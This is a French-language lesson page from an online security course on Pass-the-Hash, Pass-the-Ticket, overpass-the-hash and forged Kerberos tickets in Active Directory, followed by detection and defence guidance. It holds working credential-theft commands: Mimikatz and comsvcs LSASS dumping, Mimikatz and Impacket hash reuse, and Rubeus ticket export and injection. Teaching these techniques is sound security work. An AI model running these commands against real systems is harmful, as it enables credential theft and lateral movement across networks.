Pass-the-Hash et Pass-the-Ticket
Réutiliser des identifiants volés.
Pass-the-Hash et Pass-the-Ticket est une leçon Cyber Security Academy gratuite sur CoddyKit. Ceci est la leçon 3 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Cyber Security Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Cyber Security Academy comprend 4 leçons au total.
Des identifiants sans mots de passe
L'authentification Windows ne nécessite souvent pas le mot de passe en clair au moment de son utilisation. Les hachages NTLM comme les tickets Kerberos peuvent s'authentifier seuls. Les attaquants exploitent ce fait : ils volent l'artefact, puis le réutilisent.
- Le passage par le hachage (PtH) réutilise un hachage NTLM.
- Le passage par le ticket (PtT) réutilise un ticket Kerberos.
- Aucun des deux ne nécessite de casser le mot de passe.
Où résident les identifiants
Les données d'identification sont mises en cache en mémoire et sur disque pendant le fonctionnement normal. Les sources courantes comprennent :
- La mémoire du processus LSASS contient les hachages et les tickets des utilisateurs connectés.
- La base de données SAM stocke les hachages des comptes locaux.
- NTDS.dit sur les DC stocke tous les hachages du domaine.
- Les coffres d'identifiants protégés par DPAPI et les stockages des navigateurs.
L'extraction de LSASS est l'étape de collecte la plus courante.
# Mimikatz: dump logon passwords and hashes
privilege::debug
sekurlsa::logonpasswords
# Comsvcs minidump of lsass (living-off-the-land)
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <pid> lsass.dmp fullMécanismes du passage par le hachage
L'authentification NTLM prouve que vous connaissez le mot de passe en utilisant son hachage comme secret dans un échange défi-réponse. Si vous disposez du hachage, vous pouvez terminer l'échange sans jamais connaître le mot de passe.
Le hachage NT devient ainsi un équivalent du mot de passe. Tout service acceptant NTLM est accessible avec le seul hachage.
# Mimikatz pass-the-hash spawns a process with injected creds
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:<NThash> /run:cmd.exe
# Impacket psexec via hash
psexec.py -hashes :<NThash> corp.local/Administrator@10.0.0.20Mécanismes du passage par le ticket
Les tickets Kerberos sont des jetons porteurs : quiconque détient un TGT ou un TGS valide peut l'utiliser jusqu'à son expiration. Les attaquants extraient les tickets de LSASS et les injectent dans leur propre session.
- Voler un TGT vous permet de demander des tickets de service au nom de cet utilisateur.
- Voler un TGS accorde l'accès à un service précis.
# Export all tickets, then inject one
Rubeus.exe dump /nowrap
Rubeus.exe ptt /ticket:doIF... (base64 blob)
# Mimikatz
sekurlsa::tickets /export
kerberos::ptt ticket.kirbiPassage du hachage à Kerberos
Le passage du hachage à Kerberos, aussi appelé passage par la clé, fait le lien entre NTLM et Kerberos. Vous utilisez une clé NTLM (ou AES) volée pour demander un TGT Kerberos légitime, puis vous opérez entièrement avec Kerberos.
Cette méthode est plus discrète que le passage direct par le hachage, car le trafic qui en résulte ressemble à une authentification Kerberos normale.
# Rubeus: turn an NTLM hash into a TGT
Rubeus.exe asktgt /user:svc_sql /rc4:<NThash> /ptt
# AES key is even quieter than RC4
Rubeus.exe asktgt /user:svc_sql /aes256:<key> /pttTickets d'or et d'argent
Avec un accès plus étendu, les attaquants falsifient directement les tickets.
- Un ticket d'or est un TGT falsifié et signé avec le hachage krbtgt. Il permet d'usurper n'importe quelle identité et reste valide jusqu'à la rotation de krbtgt à deux reprises.
- Un ticket d'argent est un TGS falsifié pour un service précis, signé avec le hachage du compte de service. Il ne contacte jamais le DC et reste donc discret.
- Un ticket diamant modifie un TGT émis légitimement afin d'échapper aux détections de falsification de tickets.
Schémas de déplacement latéral
La réutilisation d'identifiants permet le déplacement latéral. Les canaux d'exécution courants comprennent :
- SMB et création de services, de type psexec.
- Création de processus à distance avec WMI.
- WinRM et administration à distance avec PowerShell.
- Création d'instances d'objets DCOM.
Le même hachage ou ticket volé peut donner accès à de nombreux hôtes où le compte est administrateur local.
Pourquoi la réutilisation des administrateurs locaux est dangereuse
Un seul mot de passe d'administrateur local partagé entre plusieurs machines est catastrophique. Récupérez-le par cassage une seule fois et vous pouvez utiliser le passage par le hachage pour accéder à chaque hôte qui le partage.
LAPS résout ce problème en définissant pour chaque machine un mot de passe d'administrateur local unique et renouvelé, stocké dans AD avec des droits de lecture restreints.
Détection
Ces attaques laissent des données de télémétrie si vous les surveillez.
- Type d'ouverture de session
3ou9avec NTLM alors que Kerberos est attendu. - Événement
4624avec seclogon ou NTLM inhabituel provenant de comptes privilégiés. - Anomalies des tickets : TGS sans TGT précédent, ce qui indique un ticket d'argent, ou tickets dont la durée de validité est anormale, ce qui indique un ticket d'or.
- Accès à LSASS depuis des processus inhabituels, signalé par l'événement Sysmon
10.
Défenses
Le renforcement de la sécurité vise à protéger et à isoler les identifiants.
- Activez Credential Guard pour isoler les secrets de LSASS dans une enclave VBS.
- Ajoutez les comptes sensibles à Protected Users : pas de NTLM, pas de délégation et une courte durée de validité des tickets.
- Déployez LAPS et appliquez une administration par niveaux afin que les identifiants du niveau 0 ne se retrouvent jamais sur les postes de travail.
- Effectuez deux rotations de
krbtgten cas de compromission présumée d'un ticket d'or.
Effectuer des tests de manière responsable
L'extraction de LSASS et la falsification de tickets sont des actions à fort impact. Effectuez-les uniquement avec une autorisation explicite et sur des cibles convenues. Évitez d'extraire les données des DC de production, sauf si cela fait partie du périmètre, et détruisez de manière sécurisée les hachages et les tickets collectés après le rapport.
Documentez chaque réutilisation d'identifiants afin que les équipes de défense puissent vérifier que leurs mécanismes de détection se sont déclenchés.
Vérification rapide
Vérifiez votre compréhension des attaques par réutilisation d'identifiants.
Récapitulatif
Vous avez vu comment les hachages et les tickets volés contournent complètement les mots de passe.
- Le passage par le hachage réutilise des hachages NTLM ; le passage par le ticket réutilise des tickets Kerberos.
- Le passage du hachage à Kerberos transforme un hachage en TGT Kerberos propre.
- Les tickets d'or, d'argent et diamant sont falsifiés pour assurer la persistance.
- Credential Guard, LAPS, Protected Users et la rotation de krbtgt constituent les principales défenses.
Ensuite : transformer un point d'appui en domination complète du domaine.
Questions Fréquemment Posées
La leçon « Pass-the-Hash et Pass-the-Ticket » est-elle gratuite ?
Oui — le texte complet de « Pass-the-Hash et Pass-the-Ticket » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Cyber Security Academy, passe à CoddyKit PRO. Le cours Cyber Security Academy comprend 4 leçons au total.
Qu'est-ce que j'apprendrai dans « Pass-the-Hash et Pass-the-Ticket » ?
Réutiliser des identifiants volés. Tu pratiques Cyber Security Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.
Dois-je avoir de l'expérience pour commencer Cyber Security Academy ?
Aucune expérience préalable n'est requise. Cyber Security Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 3 sur 4.
Combien de temps prend la leçon « Pass-the-Hash et Pass-the-Ticket » ?
La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.
Peux-tu écrire et exécuter du code dans cette leçon Cyber Security Academy ?
Oui. Chaque leçon Cyber Security Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.
Toutes les leçons de ce cours
- Surface d’attaque d’Active Directory
- Kerberos et Kerberoasting
- Pass-the-Hash et Pass-the-Ticket
- Élévation de privilèges et domination du domaine